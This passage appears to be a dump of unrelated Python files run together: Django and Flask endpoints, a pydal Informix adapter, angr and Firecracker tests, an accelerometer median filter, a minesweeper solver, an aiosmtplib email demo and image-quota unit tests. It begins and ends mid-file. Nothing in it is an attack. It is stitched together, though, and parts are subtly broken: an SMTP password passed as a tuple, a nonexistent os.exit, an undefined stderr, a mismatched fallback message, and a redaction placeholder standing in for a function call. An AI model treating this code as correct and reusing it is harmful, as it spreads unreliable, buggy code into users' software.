print(config_data) resultdir = config_data["resultdir"] rc = call(["rm", "-rf", resultdir], cwd=pwd) assert rc == 0 @classmethod def teardown_class(self): """ teardown any state that was previously setup with a call to setup_class. """ pwd = os.path.abspath(os.path.dirname(__file__)) rc = call(["rm", "-rf", "test"], cwd=pwd) assert rc == 0 <gh_stars>0 from datetime import datetime from django.http import Http404, JsonResponse from currency_converter.exchange_rates import convert_amount def convert(request): """ Handles GET => /convert """ try: if request.method == 'GET': amount = float(request.GET.get('amount', 0)) src_currency = request.GET.get('src_currency', 'EUR') dest_currency = request.GET.get('dest_currency', 'EUR') reference_date = request.GET.get( 'reference_date', datetime.now().date(), ) converted = convert_amount( amount, reference_date, src_currency, dest_currency, ) response = { 'amount': converted, 'currency': dest_currency, } return JsonResponse(response) else: raise Http404('Invalid request') except Exception: raise Http404('Invalid request - check input. \ Example:\ amount=20&\ src_currency=USD&\ dest_currency=GBP&\ reference_date=2020-05-22') from __future__ import absolute_import from functools import wraps from datetime import datetime color_codes = { 'INFO': '\033[94m', 'WARNING': '\033[93m', 'SUCCESS': '\033[92m', 'ERROR': '\033[91m', } def log_method(func): @wraps(func) def wrapped(instance, value, *args, **kwargs): value = value.format(*args, **kwargs) return func(instance, value) return wrapped def print_with_color(value, color): value = "{color} [{time}] {value}\033[0m".format( color=color_codes[color], time=datetime.now().strftime("%H:%M:%S"), value=value, ) print value class Logger(object): @log_method def info(self, value): print_with_color(value, 'INFO') @log_method def warning(self, value): print_with_color(value, 'WARNING') @log_method def success(self, value): print_with_color(value, 'SUCCESS') @log_method def error(self, value): print_with_color(value, 'ERROR') """text. Usage: text clean-purpose [options] <purpose> Options: --debug Debug messages. -h --help Help message --ie=encoding Input encoding [default: utf-8] --oe=encoding Output encoding [default: utf-8] -o --output=<file> Output filename, default output to stdout --verbose Verbose messages. 
""" import codecs import logging import os from os import write from os.path import join, split import re import signal from six import b, text_type class PurposeProcessor(object): """Text processor for company purpose.""" def __init__(self): """Setup pattern and logger.""" self.logger = logging.getLogger(__name__ + '.PurposeProcessor') self.logger.addHandler(logging.NullHandler()) self.ignore_pattern = re.compile( u""" Selskabets\sform\xe5l\ser\sat\sdrive| Selskabets\sform\xe5l\ser| og\sdermed\sbesl\xe6gtet\svirksomhed| \.$ """, flags=re.UNICODE | re.VERBOSE) self.stop_words = self.read_stop_words() stop_words = sorted(self.stop_words, key=len, reverse=True) regex = '|'.join((re.escape(word) for word in stop_words)) regex = r'\b(?:' + regex + r')\b' self.stop_words_pattern = re.compile(regex, flags=re.UNICODE) def clean(self, text): """Return cleaned purpose text. Parameters ---------- text : str String with purpose Returns ------- cleaned : str String with cleaned purpose Description ----------- Remove the following fragments: "Selskabets formaal er at drive" "Selskabets formaal er" "og anden dermed beslaegtet virksomhed" "dermed beslaegtet virksomhed" "hermed beslaegtet virksomhed" """ cleaned = self.stop_words_pattern.sub('', text).strip() return cleaned def read_stop_words(self): """Read purpose stop words from data file. Returns ------- stop_words : list of str List with stop words Examples -------- >>> purpose_processor = PurposeProcessor() >>> stop_words = purpose_processor.read_stop_words() >>> 'dermed' in stop_words True """ filename = join(split(__file__)[0], 'data', 'purpose_stop_words.txt') self.logger.info('Reading stop words from {}'.format(filename)) stop_words = [] with codecs.open(filename, encoding='utf-8') as fid: for line in fid: stop_words.append(line.strip()) return stop_words def main(): """Handle command-line interface.""" from docopt import docopt arguments = docopt(__doc__) logging_level = logging.WARN if arguments['--debug']: logging_level = logging.DEBUG elif arguments['--verbose']: logging_level = logging.INFO logger = logging.getLogger() logger.setLevel(logging_level) logging_handler = logging.StreamHandler() logging_handler.setLevel(logging_level) logging_formatter = logging.Formatter( '%(asctime)s - %(name)s - %(levelname)s - %(message)s') logging_handler.setFormatter(logging_formatter) logger.addHandler(logging_handler) if arguments['--output']: output_filename = arguments['--output'] output_file = os.open(output_filename, os.O_RDWR | os.O_CREAT) else: # stdout output_file = 1 output_encoding = arguments['--oe'] input_encoding = arguments['--ie'] # Ignore broken pipe errors signal.signal(signal.SIGPIPE, signal.SIG_DFL) if arguments['clean-purpose']: purpose = arguments['<purpose>'] if not isinstance(purpose, text_type): purpose = purpose.decode(input_encoding) processor = PurposeProcessor() cleaned_purpose = processor.clean(purpose) write(output_file, cleaned_purpose.encode(output_encoding) + b('\n')) if __name__ == '__main__': main() <filename>lib/streamlit/url_util.py # -*- coding: utf-8 -*- # Copyright 2018-2020 Streamlit Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Python 2/3 compatibility from __future__ import print_function, division, unicode_literals, absolute_import from streamlit.compatibility import setup_2_3_shims setup_2_3_shims(globals()) # flake8: noqa import re import urllib # Regular expression for process_gitblob_url _GITBLOB_RE = re.compile( r"(?P<base>https:\/\/?(gist.)?github.com\/)" r"(?P<account>([\w\.]+\/){1,2})" r"(?P<blob_or_raw>(blob|raw))?" r"(?P<suffix>(.+)?)" ) def process_gitblob_url(url): """Check url to see if it describes a GitHub Gist "blob" URL. If so, returns a new URL to get the "raw" script. If not, returns URL unchanged. """ # Matches github.com and gist.github.com. Will not match githubusercontent.com. # See this regex with explainer and sample text here: https://regexr.com/4odk3 match = _GITBLOB_RE.match(url) if match: mdict = match.groupdict() # If it has "blob" in the url, replace this with "raw" and we're done. if mdict["blob_or_raw"] == "blob": return "{base}{account}raw{suffix}".format(**mdict) # If it is a "raw" url already, return untouched. if mdict["blob_or_raw"] == "raw": return url # It's a gist. Just tack "raw" on the end. return url + "/raw" return url def get_hostname(url): """Return the hostname of a URL (with or without protocol).""" # Just so urllib can parse the URL, make sure there's a protocol. # (The actual protocol doesn't matter to us) if "://" not in url: url = "http://%s" % url parsed = urllib.parse.urlparse(url) return parsed.hostname def print_url(title, url): """Pretty-print a URL on the terminal.""" import click click.secho(" %s: " % title, nl=False, fg="blue") click.secho(url, bold=True) <reponame>arvindkarir/python-pandas-code<gh_stars>0 '''check input for integers, do their square. If it is a string, print string (which may be true for all cases but integers''' def readVal(valType, requestMsg, errorMsg): while True: val = raw_input(requestMsg + ' ') try: val = valType(val) #if this tries to find valType int of a string, it generates an error, so goes to except block return val except ValueError: print val, errorMsg val = readVal(int, 'Enter integer:', 'is not an integer') #this will invoke the readVal function for integers print 'square of', val, 'is:', val**2 print 'now evaluating a string' val = readVal(str, 'Enter a string:', 'is not a string') #this will invoke the readVal function for string print 'just another string', val # Copyright 2020-2021 <NAME>. All rights reserved. # This project is licensed under the terms of the MIT License. 
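# Reviewer note (not part of the original source): this youpy script registers two
# Scratch-style event handlers -- when_program_start() initializes and hides a shared
# score variable and switches the backdrop to "Welcome", and when_space_key_pressed()
# shows the score and switches to "InGame" -- then hands them to the engine via
# run(locals()).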
from youpy.code.english.everything import * def when_program_start(): console.print("program is starting") shared_variable.score = 1 shared_variable.score.hide() switch_backdrop_to("Welcome") console.print("done initializing the program") def when_space_key_pressed(): shared_variable.score.show() switch_backdrop_to("InGame") run(locals()) <reponame>kjkuan/pydal # -*- coding: utf-8 -*- import datetime import re from .._globals import IDENTITY from .base import BaseAdapter class InformixAdapter(BaseAdapter): drivers = ('informixdb',) types = { 'boolean': 'CHAR(1)', 'string': 'VARCHAR(%(length)s)', 'text': 'BLOB SUB_TYPE 1', 'json': 'BLOB SUB_TYPE 1', 'password': 'VARCHAR(%(length)s)', 'blob': 'BLOB SUB_TYPE 0', 'upload': 'VARCHAR(%(length)s)', 'integer': 'INTEGER', 'bigint': 'BIGINT', 'float': 'FLOAT', 'double': 'DOUBLE PRECISION', 'decimal': 'NUMERIC(%(precision)s,%(scale)s)', 'date': 'DATE', 'time': 'CHAR(8)', 'datetime': 'DATETIME', 'id': 'SERIAL', 'reference': 'INTEGER REFERENCES %(foreign_key)s ON DELETE %(on_delete_action)s', 'list:integer': 'BLOB SUB_TYPE 1', 'list:string': 'BLOB SUB_TYPE 1', 'list:reference': 'BLOB SUB_TYPE 1', 'big-id': 'BIGSERIAL', 'big-reference': 'BIGINT REFERENCES %(foreign_key)s ON DELETE %(on_delete_action)s', 'reference FK': 'REFERENCES %(foreign_key)s ON DELETE %(on_delete_action)s CONSTRAINT FK_%(table_name)s_%(field_name)s', 'reference TFK': 'FOREIGN KEY (%(field_name)s) REFERENCES %(foreign_table)s (%(foreign_key)s) ON DELETE %(on_delete_action)s CONSTRAINT TFK_%(table_name)s_%(field_name)s', } def RANDOM(self): return 'Random()' def NOT_NULL(self,default,field_type): return 'DEFAULT %s NOT NULL' % self.represent(default,field_type) def select_limitby(self, sql_s, sql_f, sql_t, sql_w, sql_o, limitby): if limitby: (lmin, lmax) = limitby fetch_amt = lmax - lmin dbms_version = int(self.connection.dbms_version.split('.')[0]) if lmin and (dbms_version >= 10): # Requires Informix 10.0+ sql_s += ' SKIP %d' % (lmin, ) if fetch_amt and (dbms_version >= 9): # Requires Informix 9.0+ sql_s += ' FIRST %d' % (fetch_amt, ) return 'SELECT %s %s FROM %s%s%s;' % (sql_s, sql_f, sql_t, sql_w, sql_o) def represent_exceptions(self, obj, fieldtype): if fieldtype == 'date': if isinstance(obj, (datetime.date, datetime.datetime)): obj = obj.isoformat()[:10] else: obj = str(obj) return "to_date('%s','%%Y-%%m-%%d')" % obj elif fieldtype == 'datetime': if isinstance(obj, datetime.datetime): obj = obj.isoformat()[:19].replace('T',' ') elif isinstance(obj, datetime.date): obj = obj.isoformat()[:10]+' 00:00:00' else: obj = str(obj) return "to_date('%s','%%Y-%%m-%%d %%H:%%M:%%S')" % obj return None REGEX_URI = re.compile('^(?P<user>[^:@]+)(\:(?P<password>[^@]*))?@(?P<host>[^\:/]+)(\:(?P<port>[0-9]+))?/(?P<db>.+)$') def __init__(self,db,uri,pool_size=0,folder=None,db_codec ='UTF-8', credential_decoder=IDENTITY, driver_args={}, adapter_args={}, do_connect=True, after_connection=None): self.db = db self.dbengine = "informix" self.uri = uri if do_connect: self.find_driver(adapter_args,uri) self.pool_size = pool_size self.folder = folder self.db_codec = db_codec self._after_connection = after_connection self.find_or_make_work_folder() ruri = uri.split('://',1)[1] m = self.REGEX_URI.match(ruri) if not m: raise SyntaxError( "Invalid URI string in DAL: %s" % self.uri) user = credential_decoder(m.group('user')) if not user: raise SyntaxError('User required') password = credential_decoder(m.group('password')) if not password: password = '' host = m.group('host') if not host: raise 
SyntaxError('Host name required') db = m.group('db') if not db: raise SyntaxError('Database name required') user = credential_decoder(user) password = <PASSWORD>(password) dsn = '%s@%s' % (db,host) driver_args.update(user=user,password=password) def connector(dsn=dsn,driver_args=driver_args): return self.driver.connect(dsn,**driver_args) self.connector = connector if do_connect: self.reconnect() def execute(self,command): if command[-1:]==';': command = command[:-1] return self.log_execute(command) def lastrowid(self,table): return self.cursor.sqlerrd[1] class InformixSEAdapter(InformixAdapter): """ work in progress """ def select_limitby(self, sql_s, sql_f, sql_t, sql_w, sql_o, limitby): return 'SELECT %s %s FROM %s%s%s;' % \ (sql_s, sql_f, sql_t, sql_w, sql_o) def rowslice(self,rows,minimum=0,maximum=None): if maximum is None: return rows[minimum:] return rows[minimum:maximum] <filename>aldryn_gallery/migrations/0002_galleryplugin_extra_styles.py # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('aldryn_gallery', '0001_initial'), ] operations = [ migrations.AddField( model_name='galleryplugin', name='extra_styles', field=models.CharField(help_text='An arbitrary string of CSS classes to add', max_length=50, verbose_name='Extra styles', blank=True), preserve_default=True, ), ] import logging import os import nose.tools import archinfo import angr from angr.calling_conventions import SimStackArg, SimRegArg, SimCCCdecl, SimCCSystemVAMD64 test_location = os.path.join(os.path.dirname(os.path.realpath(str(__file__))), '..', '..', 'binaries', ) def run_fauxware(arch, function_and_cc_list): binary_path = os.path.join(test_location, 'tests', arch, 'fauxware') fauxware = angr.Project(binary_path, auto_load_libs=False) cfg = fauxware.analyses.CFG() for func_name, expected_cc in function_and_cc_list: authenticate = cfg.functions[func_name] _ = fauxware.analyses.VariableRecoveryFast(authenticate) cc_analysis = fauxware.analyses.CallingConvention(authenticate) cc = cc_analysis.cc nose.tools.assert_equal(cc, expected_cc) def run_cgc(binary_name): binary_path = os.path.join(test_location, '..', 'binaries-private', 'cgc_qualifier_event', 'cgc', binary_name) project = angr.Project(binary_path) categorization = project.analyses.FunctionCategorizationAnalysis() tag_manager = categorization.function_tag_manager print "INPUT:", map(hex, tag_manager.input_functions()) print "OUTPUT:", map(hex, tag_manager.output_functions()) def test_fauxware(): amd64 = archinfo.arch_from_id('amd64') args = { 'i386': [ ('authenticate', SimCCCdecl( archinfo.arch_from_id('i386'), args=[SimStackArg(4, 4), SimStackArg(8, 4)], sp_delta=4 ) ), ], 'x86_64': [ ('authenticate', SimCCSystemVAMD64( amd64, args=[SimRegArg('rdi', 8), SimRegArg('rsi', 8)], sp_delta=8 ) ), ], } for arch, lst in args.iteritems(): yield run_fauxware, arch, lst # def test_cgc(): def disabled_cgc(): # Skip this test since we do not have the binaries-private repo cloned on Travis CI. binaries = [ '002ba801_01', '01cf6c01_01', ] for binary in binaries: yield run_cgc, binary def run_all(): logging.getLogger("angr.analyses.variable_recovery.variable_recovery_fast").setLevel(logging.DEBUG) for args in test_fauxware(): func, args = args[0], args[1:] func(*args) #for args in test_cgc(): # func, args = args[0], args[1:] # func(*args) if __name__ == "__main__": run_all() # Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. 
# SPDX-License-Identifier: Apache-2.0 """Basic tests scenarios for snapshot save/restore.""" import platform import pytest from framework.microvms import VMNano import host_tools.network as net_tools # pylint: disable=import-error @pytest.mark.skipif( platform.machine() != "x86_64", reason="Not supported yet." ) def test_pause_resume(bin_cloner_path): """Test scenario: boot/pause/resume.""" vm_instance = VMNano.spawn(bin_cloner_path) microvm = vm_instance.vm # Pausing the microVM before being started is not allowed. response = microvm.vm.patch(state='Paused') assert microvm.api_session.is_status_bad_request(response.status_code) # Resuming the microVM before being started is also not allowed. response = microvm.vm.patch(state='Resumed') assert microvm.api_session.is_status_bad_request(response.status_code) microvm.start() ssh_connection = net_tools.SSHConnection(microvm.ssh_config) # Verify guest is active. exit_code, _, _ = ssh_connection.execute_command("ls") assert exit_code == 0 # Pausing the microVM after it's been started is successful. response = microvm.vm.patch(state='Paused') assert microvm.api_session.is_status_no_content(response.status_code) # Verify guest is no longer active. exit_code, _, _ = ssh_connection.execute_command("ls") assert exit_code != 0 # Pausing the microVM when it is already `Paused` is allowed # (microVM remains in `Paused` state). response = microvm.vm.patch(state='Paused') assert microvm.api_session.is_status_no_content(response.status_code) # Resuming the microVM is successful. response = microvm.vm.patch(state='Resumed') assert microvm.api_session.is_status_no_content(response.status_code) # Verify guest is active again. exit_code, _, _ = ssh_connection.execute_command("ls") assert exit_code == 0 # Resuming the microVM when it is already `Resumed` is allowed # (microVM remains in the running state). response = microvm.vm.patch(state='Resumed') assert microvm.api_session.is_status_no_content(response.status_code) # Verify guest is still active. exit_code, _, _ = ssh_connection.execute_command("ls") assert exit_code == 0 microvm.kill() class BadRespond: ''' This class sends an error response if a path is not defined in the UServer.__router_paths. :response: This is a Response object. :request: This is a Request object. ''' def __init__(self, response, request): self.responseObject = response self.requestObject = request self.responseObject.status = 500 self.bad_request_html = ''' <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Bad Request

</title>
        </head>
        <body>
            <h1>{} not supported on {} path.</h1>
        </body>
        </html>
# # Median filter for AX3 CSV data # # Axes: # X is the long axis # Y is the across-the-device axis # Z is across the thickness of the device axis from Row import Row from tkinter import filedialog import argparse import csv import math import numpy as np import os import sys import tkinter as tk from medianfilter import medianFilter class MedianProcessor: def makeOutFile(self, filename): """ Make output filename """ path, name = os.path.split(filename) newName = "median_" + name fullPath = os.path.join(path, newName) print("Output file is", fullPath) return fullPath def process(self, filename, window): """ Process the file """ # Count number of lines in file to get array dimension print(f"Median window size is {window}") print("Count lines in file") count = 0 with open(filename, "rt", newline="\n") as fh: line = fh.readline().strip() while line: row = Row(line) if row.skip: pass else: count += 1 if count % 1000000 == 0: print(f"{count} lines counted") line = fh.readline().strip() # Set initial values of array to match actual field length timestamp = np.array(["YYYY-MM-DD HH:MM:SS.FFF" for _ in range(count)]) x = np.zeros((count,)) y = np.zeros((count,)) z = np.zeros((count,)) print("Read file") firstLine = None with open(filename, "rt", newline="\n") as fh: line = fh.readline().strip() index = 0 while line: row = Row(line) if row.skip: pass else: if firstLine is None: firstLine = row.timestamp timestamp[index] = row.timestamp x[index] = row.val[0] y[index] = row.val[1] z[index] = row.val[2] index += 1 if index % 1000000 == 0: print(f"{index} data lines read") line = fh.readline().strip() print("Calculate x axis medians") medx = medianFilter(x, window, len(x)//50) print("Calculate y axis medians") medy = medianFilter(y, window, len(y)//50) print("Calculate z axis medians") medz = medianFilter(z, window, len(z)//50) outputFilename = self.makeOutFile(filename) lineEnd = "\r\n" with open(outputFilename, "w") as outfile: outfile.write("datetime, x, y, z{}".format(lineEnd)) for index in range(len(timestamp)): outfile.write("{},{:.06f},{:.06f},{:.06f}{}".format( timestamp[index], medx[index], medy[index], medz[index], lineEnd)) return outputFilename def main(): if len(sys.argv) < 2: root = tk.Tk() root.withdraw() filePath = filedialog.askopenfilename( filetypes = [("Comma separated file (CSV) format",".csv")]) window = 7 else: parser = argparse.ArgumentParser(description= "Convert accelerometer file to per second values") parser.add_argument("filename", help="Input filename") parser.add_argument("--window", help="Window size", type=int, default="7") args = parser.parse_args() filePath = args.filename name, extension = os.path.splitext(filePath) window = args.window if window < 0: print(f"Bad value for window, {window}, using 25") window = 7 if window % 2 != 1: print(f"Window size must be odd, {window}, using 25") window = 7 if extension == ".CWA": print("You need the .csv, not the .CWA", file=stderr) os.exit(0) processor = MedianProcessor() processor.process(filePath, window) if __name__ == "__main__": main() Team1157/Scan-Gameclient/client_api.py1-10 from flask import Flask, jsonify, request from datetime import datetime import json from flask_cors import CORS class Event: def __init__(self, event_level: int, event_type: str, extra_data=None): self.event_level = event_level self.event_type = event_type self.extra_data = extra_data self.time = datetime.now() self.is_read = False def mark_read(self): self.is_read = True def get_as_object(self): return {"event_level": self.event_level, 
"event_type": self.event_type, "time": self.time, "extra_data": self.extra_data} class ApiServer: def __init__(self): with open("conf.json", "r") as f: self.data = json.load(f) self.location_id = self.data["location_id"] self.events = [] def receive_event(self, event_level, event_type, extra_data): print(f"Got event {event_type} at level {event_level} with extra data {extra_data}") self.events.append(Event(event_level=int(event_level), event_type=event_type, extra_data=extra_data)) def get_event_smart(self): for event in self.events: if event.event_level > 0 and not event.is_read: event.mark_read() return event return self.events[-1] app = Flask(__name__) CORS(app) api_server = ApiServer() @app.route("/info/") def info(): return jsonify({"location_id": api_server.location_id}) @app.route("/notify_event/", methods=["POST"]) def notify_event(): data: dict = request.get_json() event_level = data["event_level"] event_type = data["event_type"] if "extra_info" in data.keys(): extra_data = data["extra_info"] else: extra_data = None api_server.receive_event(event_level=event_level, event_type=event_type, extra_data=extra_data) return jsonify(success=True) @app.route("/get_event_smart/") def get_event_smart(): event = api_server.get_event_smart() return jsonify(event.get_as_object()) if __name__ == "__main__": app.run(port=5000) fasiondog/hikyuu_house from hikyuu import PG_NoGoal # 部件作者 author = "fasiondog" # 版本 version = '20200825' def part(): return PG_NoGoal() part.__doc__ = PG_NoGoal.__doc__ if __name__ == '__main__': print(part())naivebayes.py0 from deminer import Board from collections import defaultdict from collections import namedtuple # Naive Bayses solver for MineSweeper # P(M|Window) = P(Window|M)*P(M)/P(Window) # P(M|Window) ~= P(Window|M) # P(M|Windows) ~= P(W1|M)*P(W2|M)*...*P(Wn|M) class Record(object): def __init__(self): # smooth, couse in wrong case you can get 1/2 or 2/3 mines and # virtually never try it again. 
Solver has to find at least # 150 mines to disregard it over base probal ~= 0.150 self.safe = 1000 self.tries = 1000 def chance(self): return float(self.safe)/self.tries def risk(self): return float(self.tries - self.safe)/self.tries def mine(self): self.tries += 1 return self def nomine(self): self.safe += 1 self.tries += 1 return self def __str__(self): return "Record {}/{} = {}".format(self.safe,self.tries,self.chance()) def __repr__(self): return "Record {}/{} = {}".format(self.safe,self.tries,self.chance()) def mul(iter): m = 1.0 for i in iter: m = m * i return m def train(database, window_size = 3): board = Board() ingame = True counter = 0 while ingame: fringe = [] counter+=1 # print "Itera", counter for move in board.valid_moves(): probs = [] window = board.window(move,window_size) for i,w in enumerate(window): key = i,w rec = database.get(key) if not rec: rec = Record() database[key] = rec probs.append((key,rec.chance(),rec)) prob = mul(x[1] for x in probs) # print "Move in db", move, rec.chance(), key fringe.append( (move, prob, probs) ) best = max(fringe, key=lambda x: x[1]) move = best[0] prob = best[1] probs = best[2] # print "Best move", best[0], "probability", best[1], "key", best[2] # import pdb; pdb.set_trace() ret = board.uncover(best[0]) if ret is None: # print "in game" for row in probs: row[2].nomine() # print "Move", move # print board elif ret: for row in probs: row[2].nomine() print "Won after", counter, "with move", move, prob print board ingame = False else: # print "Lost after", counter, "with move", move, prob # print board for row in probs: row[2].mine() # import pdb; pdb.set_trace() ingame = False return board def save(database): import cPickle with open("db_naive.db","w+b") as file: pickler = cPickle.Pickler(file) pickler.dump(database) def load(): import cPickle with open("db_naive.db","rb") as file: pickler = cPickle.Unpickler(file) return pickler.load() def clear(): save({}) def least_prob(db, min = 5): return sorted([ (k,v) for k,v in db.iteritems() if v.tries >= min ],key=lambda x: x[1].chance()) def most_prob(db, min = 5): return sorted([ (k,v) for k,v in db.iteritems() if v.tries >= min ], key=lambda x: x[1].risk()) def most_tried(db): return sorted([ (k,v) for k,v in db.iteritems() ],key=lambda x: x[1].tries, reverse=True) def most_mines(db): return sorted([ (k,v) for k,v in db.iteritems() ],key=lambda x: x[1].mines, reverse=True) def procedure(db = None): if not db: try: db = load() except: clear() db = load() wons = 0 losts = 0 try: while True: ret = train(db) if ret: losts += 1 else: wons += 1 except: pass print "Wons {} Losts {} Ratio {}".format(wons,losts,float(wons)/(wons+losts)) print "Saving db", save(db) print "saved" return db CodexLink/CodeStorage from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText import uvicorn import fastapi import dotenv import aiosmtplib from email.message import EmailMessage # has to be specified. import asyncio env = dotenv.load_dotenv( dotenv.find_dotenv(filename=".env", raise_error_if_not_found=True) ) import os api_instance = fastapi.FastAPI() @api_instance.on_event("startup") async def startup(): # Wrapper for send_email. 
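# Illustrative aside (reviewer sketch, not part of the original file): because nothing
# runs between creating the task and awaiting it, this startup hook behaves the same as
# awaiting the coroutine directly:
#
#     @api_instance.on_event("startup")
#     async def startup():
#         await send_email()
#
# asyncio.create_task() only pays off when other work is scheduled between the
# create_task() call and the corresponding await.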
ensure = asyncio.create_task(send_email()) await ensure async def send_email(): astmp_instance = aiosmtplib.SMTP(hostname="smtp.gmail.com", port=465, username=os.environ.get("from", None),password=("pwd", None), use_tls=True) print("Attempting to connect to GMail SMTP.") # https://stackoverflow.com/questions/10147455/how-to-send-an-email-with-gmail-as-provider-using-python await astmp_instance.connect() await astmp_instance.ehlo() print("Connected... Attempting to send some message.") # email_instance = EmailMessage() email_instance = MIMEMultipart("alternative") email_instance["From"] = os.environ.get("from", None) email_instance["To"] = os.environ.get("to", None) email_instance["Subject"] = "Test Email with aiostmplib with MIMEText" # email_instance.set_content("This is just a test. Test is just a test, it just redirects to my github.") # This does not render anything. html_message = MIMEText( "

<h1>Sent via aiosmtplib</h1>

This is just a test. Test is just a test, it just redirects to my github.", "html", "utf-8" ) email_instance.attach(html_message) await astmp_instance.send_message(email_instance) astmp_instance.close() # Since we have a close(), we really need to construct a class because we can't just do the basic import as it may result in circular dependency. print(f"Message has been sent. (from: {os.environ.get('from')}, to: {os.environ.get('to')}") @api_instance.on_event("shutdown") # We can use this for closing other tasks in CodexLink/folioblocks. def shutdown(): pass # for each_tasks in asyncio.all_tasks(): # each_tasks.cancel() # print("All tasks cancelled.") if __name__ == "__main__": try: uvicorn.run( app="__main__:api_instance", host="localhost", port=5001, reload=False ) except RuntimeError: print("Event loop for the aiosmtplib is not handled or will say event loop is closed. We may need proper handling from the shutdown instance than using try-except here.")0 # Copyright 2013, Red Hat, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import uuid import mock from mock import patch from oslo_utils import encodeutils from oslo_utils import units # NOTE(jokke): simplified transition to py3, behaves like py2 xrange from six.moves import range from xmonitor.common import exception from xmonitor.common import store_utils import xmonitor.quota from xmonitor.tests.unit import utils as unit_test_utils from xmonitor.tests import utils as test_utils UUID1 = 'c80a1a6c-bd1f-41c5-90ee-81afedb1d58d' class FakeContext(object): owner = 'someone' is_admin = False class FakeImage(object): size = None image_id = 'someid' locations = [{'url': 'file:///not/a/path', 'metadata': {}}] tags = set([]) def set_data(self, data, size=None): self.size = 0 for d in data: self.size += len(d) def __init__(self, **kwargs): self.extra_properties = kwargs.get('extra_properties', {}) class TestImageQuota(test_utils.BaseTestCase): def setUp(self): super(TestImageQuota, self).setUp() def tearDown(self): super(TestImageQuota, self).tearDown() def _get_image(self, location_count=1, image_size=10): context = FakeContext() db_api = unit_test_utils.FakeDB() store_api = unit_test_utils.FakeStoreAPI() store = unit_test_utils.FakeStoreUtils(store_api) base_image = FakeImage() base_image.image_id = 'xyz' base_image.size = image_size image = xmonitor.quota.ImageProxy(base_image, context, db_api, store) locations = [] for i in range(location_count): locations.append({'url': 'file:///g/there/it/is%d' % i, 'metadata': {}, 'status': 'active'}) image_values = {'id': 'xyz', 'owner': context.owner, 'status': 'active', 'size': image_size, 'locations': locations} db_api.image_create(context, image_values) return image def test_quota_allowed(self): quota = 10 self.config(user_storage_quota=str(quota)) context = FakeContext() db_api = unit_test_utils.FakeDB() store_api = unit_test_utils.FakeStoreAPI() store = unit_test_utils.FakeStoreUtils(store_api) base_image = FakeImage() base_image.image_id = 'id' image = 
xmonitor.quota.ImageProxy(base_image, context, db_api, store) data = '*' * quota base_image.set_data(data, size=None) image.set_data(data) self.assertEqual(quota, base_image.size) def _test_quota_allowed_unit(self, data_length, config_quota): self.config(user_storage_quota=config_quota) context = FakeContext() db_api = unit_test_utils.FakeDB() store_api = unit_test_utils.FakeStoreAPI() store = unit_test_utils.FakeStoreUtils(store_api) base_image = FakeImage() base_image.image_id = 'id' image = xmonitor.quota.ImageProxy(base_image, context, db_api, store) data = '*' * data_length base_image.set_data(data, size=None) image.set_data(data) self.assertEqual(data_length, base_image.size) def test_quota_allowed_unit_b(self): self._test_quota_allowed_unit(10, '10B') def test_quota_allowed_unit_kb(self): self._test_quota_allowed_unit(10, '1KB') def test_quota_allowed_unit_mb(self): self._test_quota_allowed_unit(10, '1MB') def test_quota_allowed_unit_gb(self): self._test_quota_allowed_unit(10, '1GB') def test_quota_allowed_unit_tb(self): self._test_quota_allowed_unit(10, '1TB') def _quota_exceeded_size(self, quota, data, deleted=True, size=None): self.config(user_storage_quota=quota) context = FakeContext() db_api = unit_test_utils.FakeDB() store_api = unit_test_utils.FakeStoreAPI() store = unit_test_utils.FakeStoreUtils(store_api) base_image = FakeImage() base_image.image_id = 'id' image = xmonitor.quota.ImageProxy(base_image, context, db_api, store) if deleted: with patch.object(store_utils, 'safe_delete_from_backend'): store_utils.safe_delete_from_backend( context, image.image_id, base_image.locations[0]) self.assertRaises(exception.StorageQuotaFull, image.set_data, data, size=size) def test_quota_exceeded_no_size(self): quota = 10 data = '*' * (quota + 1) # NOTE(jbresnah) When the image size is None it means that it is # not known. In this case the only time we will raise an # exception is when there is no room left at all, thus we know # it will not fit. # That's why 'get_remaining_quota' is mocked with return_value = 0. 
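# Illustrative aside (reviewer sketch, not from the original test suite):
# mock.patch.object replaces the named attribute with a MagicMock for the duration
# of the "with" block and restores the real attribute on exit, e.g.:
#
#     import math
#     from mock import patch
#
#     with patch.object(math, 'sqrt', return_value=3.0):
#         assert math.sqrt(2) == 3.0   # patched: always returns 3.0
#     assert math.sqrt(9) == 3.0       # restored: real sqrt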
with patch.object(xmonitor.api.common, 'get_remaining_quota', return_value=0): self._quota_exceeded_size(str(quota), data) def test_quota_exceeded_with_right_size(self): quota = 10 data = '*' * (quota + 1) self._quota_exceeded_size(str(quota), data, size=len(data), deleted=False) def test_quota_exceeded_with_right_size_b(self): quota = 10 data = '*' * (quota + 1) self._quota_exceeded_size('10B', data, size=len(data), deleted=False) def test_quota_exceeded_with_right_size_kb(self): quota = units.Ki data = '*' * (quota + 1) self._quota_exceeded_size('1KB', data, size=len(data), deleted=False) def test_quota_exceeded_with_lie_size(self): quota = 10 data = '*' * (quota + 1) self._quota_exceeded_size(str(quota), data, deleted=False, size=quota - 1) def test_append_location(self): new_location = {'url': 'file:///a/path', 'metadata': {}, 'status': 'active'} image = self._get_image() pre_add_locations = image.locations[:] image.locations.append(new_location) pre_add_locations.append(new_location) self.assertEqual(image.locations, pre_add_locations) def test_insert_location(self): new_location = {'url': 'file:///a/path', 'metadata': {}, 'status': 'active'} image = self._get_image() pre_add_locations = image.locations[:] image.locations.insert(0, new_location) pre_add_locations.insert(0, new_location) self.assertEqual(image.locations, pre_add_locations) def test_extend_location(self): new_location = {'url': 'file:///a/path', 'metadata': {}, 